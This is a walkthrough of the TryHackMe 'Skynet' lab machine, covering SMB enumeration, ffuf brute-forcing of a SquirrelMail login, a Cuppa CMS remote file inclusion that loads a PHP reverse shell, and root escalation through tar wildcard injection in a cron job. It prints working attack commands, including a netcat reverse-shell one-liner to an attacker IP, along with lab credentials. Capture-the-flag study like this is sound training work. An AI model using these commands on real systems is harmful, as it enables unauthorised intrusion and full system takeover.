THM Machine: SkyNet

Information Gathering

Got an IP from TryHackMe and I use the export command to store that IP Address in the linux environment variables.

export ip=10.10.108.117

Scanning

Starting off with a simple nmap scan to find open ports and services running on it using the following command.

$ nmap -sCV --min-rate 100 --max-rate 200 $ip

PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http
|_http-title: Skynet
110/tcp open  pop3
|_pop3-capabilities: RESP-CODES CAPA TOP PIPELINING AUTH-RESP-CODE SASL UIDL
139/tcp open  netbios-ssn
143/tcp open  imap
|_imap-capabilities: Pre-login LOGINDISABLEDA0001 IDLE LITERAL+ SASL-IR more have post-login listed ENABLE capabilities IMAP4rev1 OK ID LOGIN-REFERRALS
445/tcp open  microsoft-ds

Host script results:
|_clock-skew: mean: 1h37m20s, deviation: 2h53m12s, median: -2m40s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2022-08-16T07:27:24-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-08-16T12:27:24
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

From the nmap scan results it was found they have the following open ports in the system.

22 for SSH
80 for HTTP
110 for pop3
139 for netbios
143 for IMAP
445 for SMB that is shown as microsoft-ds in the scan result.

Enumeration

Start off the enumeration with the smb server to see how many shares they have and if can we access any of those without any credentials. SMB service many times gives us lots of information like Users, Domain Name, and Computer Name, etc.

SMB

Listing The Shares

$ smbclient -L ////$ip//

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SKYNET

From the above shares listing, we can see there are some shares that are not come by default i.e anonymous and milesdyson. We can try to access that without giving a password.

smbclient //$ip/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 21:04:00 2020
  ..                                  D        0  Tue Sep 17 12:20:17 2019
  attention.txt                       N      163  Wed Sep 18 08:04:59 2019
  logs                                D        0  Wed Sep 18 09:42:16 2019

		9204224 blocks of size 1024. 5818464 blocks available
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 09:42:16 2019
  ..                                  D        0  Thu Nov 26 21:04:00 2020
  log2.txt                            N        0  Wed Sep 18 09:42:13 2019
  log1.txt                            N      471  Wed Sep 18 09:41:59 2019
  log3.txt                            N        0  Wed Sep 18 09:42:16 2019

		9204224 blocks of size 1024. 5818460 blocks available

We got success with anonymous shares and got some files that are present in them. Upon checking I see log1.txt has some kind of password list and attention.txt some information also but they also mentioned the name Miles Dyson. We see a share name related to that also.

HTTP

Now we start enumerating the HTTP server, In the webserver, we are often interested to find some login pages, hidden files, directories, any information related to CMS and its versions if applicable, and Backend technologies and their versions, etc. After knowing that we try to find vulnerabilities in it.

Content-Discovery Result

$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ

admin                   [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 188ms]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 188ms]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
config                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 189ms]
ai                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
squirrelmail            [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 248ms]

After running ffuf for content, discovery found some pages on which squirrelmail have login functionality. I tried the fuzz with the user milesdyson as username and log1.txt as passwords list to find some valid credentials, the command is like the following.

$ ffuf -w log1.txt:FUZZ -u http://10.10.108.117/squirrelmail/src/redirect.php -X POST -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-Type: application/x-www-form-urlencoded" -fs 1789

From above

-w is used to specify the wordlist in that case it log1.txt file.
:FUZZ is a keyword used to specify a FUZZING position, In which : is a separator and FUZZ is the actual keyword. Note we can avoid it for a single list but for multiple lists, we must supply it with different keywords.
-u is used to specify the URL.
-X is used to specify the request method.
-d is used to specify the web request data.
-H is used to specify the Request Header in that case it's Content-Type: application/x-www-form-urlencoded that must be supplied because we are sending a POST request with parameters.
-fs is used to filter results by their response size. We got a different response and many of them had the same sizes that have wrong credentials so we filter that request size so we only get a few of them that have a valid login.

Using the above command we got a valid login credential.

Valid Credentials

milesdyson:cyborg007haloterminator

Using the above credentials we can login to the squirrelmail server which is an email server in which we can send and receive emails. There we see milesdyson the user has some emails that we can read, there we found an email that says the following.

Samba Password reset

We have changed your smb password after the system malfunction.
Password: )s{A&2Z=F^n_E.B`

Another Password was found.

Other Emails and their content.

From: serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

---
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to

Nothing Special there.

SMB - Miles

We have the miles smb password now so we can login using that.

$ smbclient //$ip/milesdyson -U milesdyson

Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 17 14:05:47 2019
  ..                                  D        0  Wed Sep 18 08:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 14:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 14:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 14:05:14 2019
  notes                               D        0  Tue Sep 17 14:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 14:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 14:05:14 2019

		9204224 blocks of size 1024. 5818448 blocks available
smb: \> cd notes
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 14:18:40 2019
  ..                                  D        0  Tue Sep 17 14:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 14:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 14:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 14:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 14:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 14:01:29 2019
  important.txt                       N      117  Tue Sep 17 14:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 14:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 14:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 14:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 14:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 14:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 14:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 14:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 14:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 14:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 14:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 14:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 14:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 14:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 14:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 14:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 14:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 14:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 14:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 14:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 14:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 14:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 14:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 14:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 14:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 14:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 14:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 14:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 14:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 14:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 14:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 14:01:29 2019

		9204224 blocks of size 1024. 5818448 blocks available

From above we see miles users have so many files in their shares but one file catches my eye, important.txt. The important.txt file has some useful things.

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Above we see they write a To-do list in which they mentioned some important things related to his life and work but we are only interested in /45kra24zxs28v3yd that very looks like an http directory, and it is confirmed as a web directory when I visit. They are a valid directory but there is nothing special that we can exploit so I start the ffuf scan to do some content discovery.

Content-Discovery - /45kra24zxs28v3yd

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:F -u http://$ip/45kra24zxs28v3yd/F -o ffuf2.log -ic

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.108.117/45kra24zxs28v3yd/F
 :: Wordlist         : F: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Output file      : ffuf2.log
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

administrator           [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 188ms]

Found an administrator endpoint very nice!!.

Exploitation & Initial Access

Administrator Page mentioned it as a cuppa CMS and by using searchsploit cuppa cms we found a potential RFI(Remote File Inclusion) vulnerability. Knowing that I download a php reverse shell code bypentest monkey. Make some changes related to IP and port number and host that file using a Python http server. Then I use the following command that exploits RFI vulnerability in which they request our shell.php` file and executed it that gives us a remote reverse shell.

Note: Open your listener using nc -lvnp 4444 before running the following command.

curl http://10.10.108.117/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$ip/shell.php

Privilege Escalation

After gaining access to the system with a low-privilege user www-data, I start enumerating the system like finding SUID binaries, sudo permissions, etc but nothing special is found when I use the following command to see the content of a crontab file.

cat /etc/crontab

I see there is a cronjob running by the root user. They are running /home/milesdyson/backups/backups.sh on every minute. I checked if can I read the backup.sh file and I see I can and they have the following content.

www-data@skynet:/home/milesdyson/backups$ ll
total 1640
-rwxr-xr-x 1 root root      74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root root 4413440 Aug 16 09:58 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

There they backup everything in the /var/www/html directory to backup.tgz. One thing to note they use the wildcard * which means everything i.e files, directories, etc. This is a risky thing because there is a technique named wile card injection in which we can make files that look like an argument like the ls command in which we use an argument -al to list all files. For the tar binary, there is a documented way to execute the command with the following method.

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.186.33 5555 >/tmp/f" > shell.sh

Above we create a file shell.sh in /var/www/html that has a reverse shell command on it. Then use the following command to create a file that looks like an argument of the tar command that eventually executes the shell.sh file.

$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"

Recap: We make a file in the /var/www/html directory with the names --checkpoint-action=exec=sh shell.sh, /var/www/html/--checkpoint=1 and shell.sh that has our reverse shell command on it.

So when the cronjob run tar the command executes and they take the directory name as an argument that executes our shell command. The --checkpoint-action=exec= is a legit argument of the tarcommand that is used to run a system command after compressing a file. By following the above method I eventually received a reverse shell back from the root user.

Note: You have to start your listener using the nc -lvnp 5555 Command so you can catch the reverse shell.

Now you are a root user copies the flags and submits them to TryHackMe and solves the machine.

$ cat /home/*/user.txt && cat /root/root.txt

PreviousTHM Machine Relevant NextTHM Room: Web Fundamentals

Last updated 2 years ago

Was this helpful?